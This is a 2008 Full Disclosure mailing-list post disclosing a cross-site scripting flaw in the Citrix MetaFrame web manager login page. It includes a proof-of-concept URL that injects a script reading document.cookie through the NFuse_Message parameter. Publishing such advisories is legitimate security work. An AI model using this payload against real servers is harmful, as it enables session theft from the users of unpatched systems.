Full Disclosure mailing list archives
Citrix MetaFrame web manager remote XSS
From: Handrix <handrix () gmail com>
Date: Fri, 22 Feb 2008 16:26:58 +0000
Citrix MetaFrame remote xss Author: handrix Contact: handrix_at_morx_dot_org Vulnerability: Cross Site Scripting Severity: Medium/High MorX security research team www.morx.org The Citrix MetaFrame web manager are vulnerable to XSS attack. XSS Vector : http://server/Citrix/MetaFrameXP/default/login.asp?NFuse_LogoutId=Off&NFuse_MessageType=warning&NFuse_Message=%3Cscript%3Ealert(document.cookie);%3C/script%3E
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Citrix MetaFrame web manager remote XSS Handrix (Feb 22)